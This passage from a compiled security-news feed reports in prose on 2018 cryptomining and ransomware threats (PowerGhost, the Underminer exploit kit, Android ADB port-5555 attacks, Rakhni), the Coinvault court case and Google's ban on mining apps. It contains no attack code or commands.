PowerGhost is an obfuscated PowerShell script containing not only the malware’s core code, but also a series of add-on modules such as the miner and libraries required for the miner’s operation, Mimikatz, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.
By employing multiple fileless techniques, the malware remains inconspicuous to the user and undetected by antivirus technologies, Kaspersky notes.
During infection, which is performed via exploits or remote administration tools (Windows Management Instrumentation), a one-line PowerShell script is executed to drop the miner’s body and immediately launch it, without writing it to the hard drive.
After that, the script, which is PowerGhost itself, checks the command and control (C&C) server and, if a new version is available, it fetches and runs it.
Mimikatz is used to get the user account credentials from the machine. Then, the malware logs on and attempts propagation on the local network by launching a copy of the initial script via WMI. The threat also attempts to spread leveraging the EternalBlue exploit (CVE-2017-0144).
After using Mimikatz and WMI to spread to a new machine, the malware also attempts to escalate privileges on the newly infected system using various exploits (including one for CVE-2018-8120).
All modules are saved as properties of a WMI class, while the miner’s body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes. The miner is launched via reflective PE injection.
One PowerGhost version also included the ability to launch distributed denial of service (DDoS) attacks, likely because its authors attempted to make extra money by offering DDoS services.
This DDoS function is the only one that copies files to the hard drive and Kaspersky's security researchers believe it will be replaced with a fileless implementation in a future version of the malware. The researchers believe the DDoS function was added to the malware, because it is launched in a peculiar manner, where the DDoS module and a function to launch it are downloaded and saved to the disk separately.
To date, PowerGhost was mainly observed within corporate local area networks and has been mainly encountered in India, Brazil, Columbia, and Turkey.
Underminer Exploit Kit spreading Bootkits and cryptocurrency miners
30.7.2018 securityaffairs Cryptocurrency
New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.
Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.
“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by TrendMicro.
“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”
Researchers first noticed the Underminer Exploit activity on July 17 while it was distributing the payloads mainly to Asian countries, mostly in Japan (69,75%) and Taiwan (10,52%).
Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files with a customized format similar to ROM file system format (romfs). According to the experts, this makes it difficult to analyze the malicious code.
The Underminer exploit kit appears to have been created in November 2017 when it only included the code for the exploitation of Flash vulnerabilities and delivered fileless payloads to deliver and execute the malware.
The Underminer EK includes functionalities also employed by other exploit kits, including:
browser profiling and filtering;
preventing of client revisits;
asymmetric encryption of payloads;
The EK redirect visitors to a landing page that profile and detect the user’s Adobe Flash Player version and browser type via user-agent.
In case the visitor’s profile does not match the one associated with a target of interest, the exploit kit will not deliver malicious content and redirect the visitor to a clean website.
The Underminer exploit kit also sets a token to the browser cookie, with this trick if the victim already accessed the landing page, it only delivers an HTTP 404 error message instead of payloads.
Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:
CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.
All the above flaws have been exploited by other EKs in the past.
Below the infection flow of Underminer’s exploits described by Trend Micro.Underminer modus operandi
“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.
Google bans cryptocurrency mining apps from the official Play Store
28.7.2018 securityaffairs Cryptocurrency
Google has updated the Play Store Developer Policy page to ban mobile mining apps that mine cryptocurrencies using the computational resources of the devices.
Due to the surge in cryptocurrency prices, many legitimate websites and mobile apps are increasingly using cryptocurrency miners.
Following Apple’s decision of banning cryptocurrency mining apps announced in June, also Google has updated the Play Store Developer Policy page to ban mobile apps that mine cryptocurrencies using the computational resources of the devices.
“We don’t allow apps that mine cryptocurrency on devices,” reads the entry included in the policy.
Google will start to remove any app from the official Play Store that uses a device’s resources for mining operations, but it clarified that “apps that remotely manage the mining of cryptocurrency” are not included in the ban.
Mining activities have a dramatic effect on the performance of the device and in some cases, it could also damage it by causing overheat or destroy batteries.
In December, experts from Kaspersky have spotted an Android malware dubbed Loapi that includes a so aggressive mining component that it can destroy your battery.
Last month, Google banned cryptocurrency mining extensions from its Chrome Web store after finding many of them abusing users’ resources without consent.
Since January, Facebook also banned ads that promote financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings, and cryptocurrency.
Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency
24.7.2018 securityaffairs Android Cryptocurrency
It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.
In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.
Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.
The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb.) According to the Google developer portal,
“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”
These are very powerful functions for debugging tools, and also useful for executing malicious code without being trapped by the usual security controls. As long as the adb tools is being used in a secured environment, it presents little risk. It is recommended that the adb service is disabled before releasing devices to consumers and it is common for the adb service to be restricted to USB connectivity only.
In early June security researcher Kevin Beaumont, warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He goes on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet, “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It only took one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.
According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”
The Trend Micro researchers’ analysis shows a fairly typical command & control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server, then scans processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.
It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.
The Trend Micro researchers offer a few suggestions to reduce your risk:
On your mobile device, go to settings, select “Developer Options” and ensure that “ADB (USB) debugging and “Apps from Unknown Sources” are turned off
Apply recommended patches and updates from the vendor
Perform a factory reset to erase the malware if you feel you are infected
Update intrusion prevention systems (IPS) to identify potentially malicious code from reaching your device
The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.
Coinvault, the court case
19.7.2018 Kaspersky Cryptocurrency
Today, after almost 3 years of waiting, it was finally the day of the trial. In the Netherlands, where the whole case took place, the hearings are open to the public. Meaning anyone who is interested can visit. And it was quite busy. Because besides the suspects, their lawyers, the judges and the prosecutor there were also several members of the press, a sketch artist (to make a drawing of the suspects), several members of the Dutch police, a few victims and other people who were interested in the case.
The defence started by calling the public prosecution service “niet ontvankelijk” for one of the defendants, meaning they are not allowed to prosecute the case. As a reason there was given that one of the defendants was underage during some of the actions. However, all three of the judges also do cases concerning underaged defendants and after a quick consultation with each other they decided to continue.
The hearing was resumed with what the two brothers were accused of:
Breaking into computers;
Make other people’s work inaccessible;
Extortion of 1295 people.
For us it was quite interesting to understand how they came up with the number of 1295 people, because when we released our final decryption tool we had at least 14k keys. So most likely much more people were infected. In fact, we think a zero could be added to 1295 to give a more realistic view on the number of victims.
The judge then went on with was basically a summary of the case. What happened, why did they do certain things etc. We as researchers often guess about motives behind actions, but we can never be 100% certain until there is a confession of the criminal. One of such an example is the amount of ransom to pay. During the time this all took place the brothers wanted 1 bitcoin as a ransom, which was worth about 220 euro at the time. We always say that we believe ransomware criminals choose a relatively small amount to make it more attractive to pay. When the judge asked the same question they gave exactly this answer. Always good to see your theories being confirmed 🙂
Some other interesting facts were that the case file was too big to fit in a moving box, they made around 20k euro (10k each), they didn’t stop with making ransomware because of the technical challenges, they accepted the risk of C2 seizure and they didn’t really see the influence their actions had on the victims. One of the judges then asked how this was possible, because they had a helpdesk where victims could e-mail to in case they had problems. All their “helpdesk” replies were that the victims just had to pay. The answers they gave to the judge weren’t very convincing.
The suspects mentioned though they started the helpdesk because their malware had some implementation mistakes (files were encrypted twice for example). A consequence of this is that even today, despite releasing our decryption tool which has all the keys, some victims were not able to recover all of their files. There was even one victim who mentioned that he just deleted all of his files because he didn’t believe a decryption tool would come available.
Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path. When we worked with the police on this case they kindly asked us to remove that screenshot (which we did), so that the suspects didn’t realize they made a mistake. During the court case they mentioned that they read the blogpost and saw their name and they were on the edge of stopping their campaign, but ultimately decided not to.
It then continued with claims by victims who paid money to get their files back. One of the victims was interested in Bitcoin and decided to pay the ransom. However, he already had some bitcoins on his computer, which were stolen by the suspects (the software supported this functionality) and now he wanted his bitcoin back :). One other victim had his own company and this took place while he was on vacation. He wanted 5000 euro because the suspects ruined his vacation and with the 5000 euro he could go on vacation again.
Now it was time for the prosecutor: twelve months of jail time will all but three suspended. Effectively this comes down to three months – the time they already did * ⅔ = about two months of jail. The lawyers then requested (since they made a full confession, wanted to help the victims getting their files back, etc) many hours of community service. One of the reasons not request jail time was because: “Bitcryptor is not malware”. But BitCryptor was the follow up of Coinvault, different name for the same software. Nobody really understood the quote, except for the lawyer, since it was obvious malware and made some victims.
In two weeks, on the 26th of July at 13:00 CET we know the outcome.
Trojan Either Encrypts Files or Mines for Cryptocurrency
7.7.2018 securityweek Cryptocurrency
A long established ransomware family recently added the ability to deploy a cryptocurrency miner instead of file encryptor, based on the victim machine’s configuration.
The malware, which Kaspersky Lab detects as Rakhni, was first discovered in 2013 and has received numerous updates ever since. The latest feature added to the threat, however, makes it stand out from the crowd: the malware’s downloader checks the victim system and decides whether to infect it with a cryptor or a miner.
Mainly affecting users in Russia but spread worldwide, the Trojan is being distributed via spam emails with a malicious Word document attached. The file has an embedded PDF document that, once opened, launches a malicious downloader and also displays a fake error message to the victim.
The malware poses as software from Adobe, and even uses a fake digital signature featuring the name Adobe Systems Incorporated.
Once executed, it performs a series of checks to determine if it runs in a virtualized environment or if it is being analyzed, creates a registry key, and checks the process count, computer name, and IP address. The downloader also checks registry keys for specific strings associated with virtual machines, sandbox and analysis tools.
After completing this exhaustive list of checks (over 200), the threat proceeds to install a root certificate from its resources. The malware also checks for anti-virus programs on the system and can disable Windows Defender if no other AV process is found.
The downloader checks if the folder %AppData%\Bitcoin is present on the machine and drops the cryptor if it exists. If not, and there are more than two logical processors, the miner is dropped. If the folder doesn’t exist and there’s only one logical processor, the malware jumps to a worm component.
The cryptor performs its own set of checks on the machine, targets over 60 processes for termination, and only starts the encryption process if the system has been idle for 2 minutes. The malware targets nearly 200 file types for encryption, uses the RSA-1024 encryption algorithm, and appends the .neitrino to the affected files.
The miner generates a VBS script that gets launched after the system reboots, and which contains two commands to mine for Monero and Monero Original, respectively. Then, if the installation directory also contains the svchost.exe file, the malware launches it to mine for Dashcoin. A fake Microsoft certificate is used to hide the malicious process on the system.
“When this analysis was carried out, the downloader was receiving an archive with a miner that didn’t use the GPU. The attacker uses the console version of the MinerGate utility for mining,” Kaspersky explains.
The malware was also observed sending emails to a hardcoded address, to provide attackers with information such as computer name, IP address, malware’s path on the system, data and time, and malware build date, in addition to providing details on the infection itself.
The downloader was also observed attempting to spread to other computers on the local network. For that, it gets a list of network shares and then checks each computer to see if the folder Users is shared, in an attempt to copy itself to the Startup folder of each accessible user.
The malware also creates a batch file to delete all ‘temporary’ files used during infection, a rather common behavior.